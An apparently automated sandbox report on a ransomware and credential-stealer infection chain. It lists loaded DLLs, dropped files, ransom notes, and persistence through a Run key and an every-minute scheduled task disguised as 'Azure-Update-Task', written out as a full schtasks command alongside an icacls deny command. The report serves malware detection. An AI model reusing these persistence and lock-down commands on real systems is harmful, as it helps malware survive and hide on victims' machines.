Source: C:\Windows\explorer.exe Section loaded: windows.immersiveshell.serviceprovider.dll
Source: C:\Windows\explorer.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: twinui.appcore.dll
Source: C:\Windows\explorer.exe Section loaded: twinui.dll
Source: C:\Windows\explorer.exe Section loaded: pdh.dll
Source: C:\Windows\explorer.exe Section loaded: applicationframe.dll
Source: C:\Windows\explorer.exe Section loaded: photometadatahandler.dll
Source: C:\Windows\explorer.exe Section loaded: ntshrui.dll
Source: C:\Windows\explorer.exe Section loaded: rmclient.dll
Source: C:\Windows\explorer.exe Section loaded: cscapi.dll
Source: C:\Windows\explorer.exe Section loaded: linkinfo.dll
Source: C:\Windows\explorer.exe Section loaded: secur32.dll
Source: C:\Windows\explorer.exe Section loaded: version.dll
Source: C:\Windows\explorer.exe Section loaded: cryptbase.dll
Source: C:\Windows\explorer.exe Section loaded: provsvc.dll
Source: C:\Windows\explorer.exe Section loaded: holographicextensions.dll
Source: C:\Windows\explorer.exe Section loaded: virtualmonitormanager.dll
Source: C:\Windows\explorer.exe Section loaded: resourcepolicyclient.dll
Source: C:\Windows\explorer.exe Section loaded: ehstorshell.dll
Source: C:\Windows\explorer.exe Section loaded: cscui.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.immersive.dll
Source: C:\Windows\explorer.exe Section loaded: abovelockapphost.dll
Source: C:\Windows\explorer.exe Section loaded: npsm.dll
Source: C:\Windows\explorer.exe Section loaded: windows.web.dll
Source: C:\Windows\explorer.exe Section loaded: windows.shell.bluelightreduction.dll
Source: C:\Windows\explorer.exe Section loaded: mscms.dll
Source: C:\Windows\explorer.exe Section loaded: coloradapterclient.dll
Source: C:\Windows\explorer.exe Section loaded: windows.internal.signals.dll
Source: C:\Windows\explorer.exe Section loaded: tdh.dll
Source: C:\Windows\explorer.exe Section loaded: windows.staterepositorybroker.dll
Source: C:\Windows\explorer.exe Section loaded: iconcodecservice.dll
Source: C:\Windows\explorer.exe Section loaded: mfplat.dll
Source: C:\Windows\explorer.exe Section loaded: rtworkq.dll
Source: C:\Windows\explorer.exe Section loaded: taskflowdataengine.dll
Source: C:\Windows\explorer.exe Section loaded: actxprxy.dll
Source: C:\Windows\explorer.exe Section loaded: structuredquery.dll
Source: C:\Windows\explorer.exe Section loaded: windows.security.authentication.web.core.dll
Source: C:\Windows\explorer.exe Section loaded: windows.data.activities.dll
Source: C:\Windows\explorer.exe Section loaded: windows.system.launcher.dll
Source: C:\Windows\explorer.exe Section loaded: windows.shell.servicehostbuilder.dll
Source: C:\Windows\explorer.exe Section loaded: windows.internal.ui.shell.windowtabmanager.dll
Source: C:\Windows\explorer.exe Section loaded: notificationcontrollerps.dll
Source: C:\Windows\explorer.exe Section loaded: windows.devices.enumeration.dll
Source: C:\Windows\explorer.exe Section loaded: windows.globalization.dll
Source: C:\Windows\explorer.exe Section loaded: icu.dll
Source: C:\Windows\explorer.exe Section loaded: mswb7.dll
Source: C:\Windows\explorer.exe Section loaded: devdispitemprovider.dll
Source: C:\Windows\explorer.exe Section loaded: windows.networking.connectivity.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.core.textinput.dll
Source: C:\Windows\explorer.exe Section loaded: uianimation.dll
Source: C:\Windows\explorer.exe Section loaded: windowsudk.shellcommon.dll
Source: C:\Windows\explorer.exe Section loaded: dictationmanager.dll
Source: C:\Windows\explorer.exe Section loaded: npmproxy.dll
Source: C:\Windows\explorer.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\explorer.exe Section loaded: winhttp.dll
Source: C:\Windows\explorer.exe Section loaded: mswsock.dll
Source: C:\Windows\explorer.exe Section loaded: winnsi.dll
Source: C:\Windows\explorer.exe Section loaded: dnsapi.dll
Source: C:\Windows\explorer.exe Section loaded: rasadhlp.dll
Source: C:\Windows\explorer.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\explorer.exe Section loaded: schannel.dll
Source: C:\Windows\explorer.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\explorer.exe Section loaded: ntasn1.dll
Source: C:\Windows\explorer.exe Section loaded: ncrypt.dll
Source: C:\Windows\explorer.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\explorer.exe Section loaded: msasn1.dll
Source: C:\Windows\explorer.exe Section loaded: dpapi.dll
Source: C:\Windows\explorer.exe Section loaded: rsaenh.dll
Source: C:\Windows\explorer.exe Section loaded: gpapi.dll
Source: C:\Windows\explorer.exe Section loaded: taskschd.dll
Source: C:\Windows\explorer.exe Section loaded: stobject.dll
Source: C:\Windows\explorer.exe Section loaded: wmiclnt.dll
Source: C:\Windows\explorer.exe Section loaded: workfoldersshell.dll
Source: C:\Windows\explorer.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Windows\explorer.exe Section loaded: pcshellcommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: cryptngc.dll
Source: C:\Windows\explorer.exe Section loaded: cflapi.dll
Source: C:\Windows\explorer.exe Section loaded: execmodelproxy.dll
Source: C:\Windows\explorer.exe Section loaded: daxexec.dll
Source: C:\Windows\explorer.exe Section loaded: container.dll
Source: C:\Windows\explorer.exe Section loaded: shellcommoncommonproxystub.dll
Source: C:\Windows\explorer.exe Section loaded: uiautomationcore.dll
Source: C:\Windows\explorer.exe Section loaded: samlib.dll
Source: C:\Windows\explorer.exe Section loaded: capabilityaccessmanagerclient.dll
Source: C:\Windows\explorer.exe Section loaded: batmeter.dll
Source: C:\Windows\explorer.exe Section loaded: sxs.dll
Source: C:\Windows\explorer.exe Section loaded: inputswitch.dll
Source: C:\Windows\explorer.exe Section loaded: windows.ui.shell.dll
Source: C:\Windows\explorer.exe Section loaded: es.dll
Source: C:\Windows\explorer.exe Section loaded: prnfldr.dll
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: E609.exe, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: mozglue.pdbP source: build2.exe, 00000013.00000002.2708700605.000000006C8CD000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: nss3.pdb@ source: build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000001A.00000000.2156846013.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001A.00000002.2242852483.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001C.00000000.2241978296.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, mstsca.exe, 00000020.00000002.2340193877.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000020.00000000.2255717001.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000023.00000000.2339511009.0000000000401000.00000020.00000001.01000000.0000000C.sdmp
Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: E609.exe, 00000009.00000002.2029153716.0000000004A10000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000A.00000002.2053427513.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000000E.00000002.2060401394.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000000F.00000002.2873162135.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000010.00000002.2077051792.00000000049E0000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000011.00000002.2873470043.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 00000019.00000002.2186742765.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 0000001B.00000002.2211120304.0000000000400000.00000040.00000400.00020000.00000000.sdmp, E609.exe, 0000001F.00000002.2266971281.0000000004A80000.00000040.00001000.00020000.00000000.sdmp, E609.exe, 00000021.00000002.2275243210.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: nss3.pdb source: build2.exe, 00000013.00000002.2709463874.000000006CA8F000.00000002.00000001.01000000.0000000D.sdmp
Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: build2.exe, 00000013.00000002.2690990099.000000001DDC8000.00000002.00001000.00020000.00000000.sdmp, build2.exe, 00000013.00000002.2691644987.000000002020D000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mozglue.pdb source: build2.exe, 00000013.00000002.2708700605.000000006C8CD000.00000002.00000001.01000000.0000000E.sdmp
Source: Binary string: HC:\bup-mage85\kuvovipor\soxecexar-kavah95\wibaju90_tavi60 p.pdb source: build3.exe, 0000001A.00000000.2156846013.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001A.00000002.2242852483.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, build3.exe, 0000001C.00000000.2241978296.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, mstsca.exe, 00000020.00000002.2340193877.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000020.00000000.2255717001.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, mstsca.exe, 00000023.00000000.2339511009.0000000000401000.00000020.00000001.01000000.0000000C.sdmp

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\rujtcgu Unpacked PE file: 4.2.rujtcgu.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\E609.exe Unpacked PE file: 10.2.E609.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\E609.exe Unpacked PE file: 15.2.E609.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Unpacked PE file: 17.2.E609.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Unpacked PE file: 19.2.build2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Unpacked PE file: 27.2.E609.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Unpacked PE file: 28.2.build3.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Unpacked PE file: 33.2.E609.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\Users\user\AppData\Roaming\rujtcgu Unpacked PE file: 34.2.rujtcgu.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 35.2.mstsca.exe.400000.0.unpack .text:ER;.data:W;.kic:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\AppData\Local\Temp\E609.exe Unpacked PE file: 10.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\E609.exe Unpacked PE file: 15.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Unpacked PE file: 17.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Unpacked PE file: 19.2.build2.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Unpacked PE file: 27.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Unpacked PE file: 28.2.build3.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Unpacked PE file: 33.2.E609.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Unpacked PE file: 35.2.mstsca.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00412220 GetCommandLineW,CommandLineToArgvW,PathFindFileNameW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,K32EnumProcesses,OpenProcess,K32EnumProcessModules,K32GetModuleBaseNameW,CloseHandle, 10_2_00412220
Source: build3.exe.15.dr Static PE information: section name: .kic
Source: build3[1].exe.15.dr Static PE information: section name: .kic
Source: sqls[1].dll.19.dr Static PE information: section name: .00cfg
Source: freebl3.dll.19.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.19.dr Static PE information: section name: .00cfg
Source: mozglue.dll.19.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.19.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.19.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.19.dr Static PE information: section name: .didat
Source: nss3.dll.19.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.19.dr Static PE information: section name: .00cfg
Source: softokn3.dll.19.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.19.dr Static PE information: section name: .00cfg
Source: mstsca.exe.28.dr Static PE information: section name: .kic
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004026D2 push ebx; ret 0_2_004026EA
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004026ED pushad ; ret 0_2_004026F4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004026F7 push ebx; ret 0_2_00402714
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402745 push edi; ret 0_2_0040276D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0040273B push edi; ret 0_2_00402742
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00402595 push ss; ret 0_2_0040259C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_004027BB push edi; ret 0_2_0040276D
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E22822 push edi; ret 0_2_02E227D4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E225FC push ss; ret 0_2_02E22603
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E227A2 push edi; ret 0_2_02E227A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E215A4 push AFD66869h; ret 0_2_02E215A9
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E227AC push edi; ret 0_2_02E227D4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E22754 pushad ; ret 0_2_02E2275B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E2275E push ebx; ret 0_2_02E2277B
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E22739 push ebx; ret 0_2_02E22751
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E546ED push D23524A7h; retn 0006h 0_2_02E546F5
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E59E74 push 4843A5D1h; retf 0_2_02E59E80
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E5462B pushad ; iretd 0_2_02E5462C
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E59E3E push ecx; retf 0_2_02E59E40
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E59BCE push eax; iretd 0_2_02E59BCF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E59DB6 push esi; iretd 0_2_02E59DB8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E59DB2 push ds; retf 0_2_02E59DB4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_02E5351E push AFD66869h; ret 0_2_02E53523
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_004026D2 push ebx; ret 4_2_004026EA
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_004026ED pushad ; ret 4_2_004026F4
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_004026F7 push ebx; ret 4_2_00402714
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_00402745 push edi; ret 4_2_0040276D
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_0040273B push edi; ret 4_2_00402742
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_00402595 push ss; ret 4_2_0040259C
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_004027BB push edi; ret 4_2_0040276D
Source: C:\Users\user\AppData\Roaming\rujtcgu Code function: 4_2_02EE2822 push edi; ret 4_2_02EE27D4

Persistence and Installation Behavior

barindex
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\nss3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe File created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\freebl3[1].dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\rujtcgu Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe File created: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\ProgramData\EGIJEBGDAFHI\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\ProgramData\EGIJEBGDAFHI\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe File created: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\ProgramData\EGIJEBGDAFHI\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\ProgramData\EGIJEBGDAFHI\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build2[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\build3[1].exe Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\ProgramData\EGIJEBGDAFHI\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\E609.exe Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\sqls[1].dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\ProgramData\EGIJEBGDAFHI\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\ProgramData\EGIJEBGDAFHI\nss3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\ProgramData\EGIJEBGDAFHI\mozglue.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\ProgramData\EGIJEBGDAFHI\msvcp140.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\ProgramData\EGIJEBGDAFHI\softokn3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\ProgramData\EGIJEBGDAFHI\freebl3.dll Jump to dropped file
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe File created: C:\ProgramData\EGIJEBGDAFHI\vcruntime140.dll Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\rujtcgu Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\E609.exe File created: C:\_readme.txt Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe File created: C:\$WinREAgent\_readme.txt Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe File created: C:\$WinREAgent\Scratch\_readme.txt Jump to behavior
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe File created: C:\_readme.txt
Source: C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe File created: C:\Users\user\_readme.txt

Boot Survival

barindex
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build3.exe Process created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
Source: C:\Users\user\AppData\Local\Temp\E609.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run SysHelper Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\file.exe Jump to behavior
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\rujtcgu:Zone.Identifier read attributes | delete Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Code function: 10_2_00481920 GetVersionExA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,GetTickCount,CloseHandle,FreeLibrary,GlobalMemoryStatus,GetCurrentProcessId, 10_2_00481920
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process created: C:\Windows\SysWOW64\icacls.exe icacls "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230" /deny *S-1-1-0:(OI)(CI)(DE,DC)
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E609.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
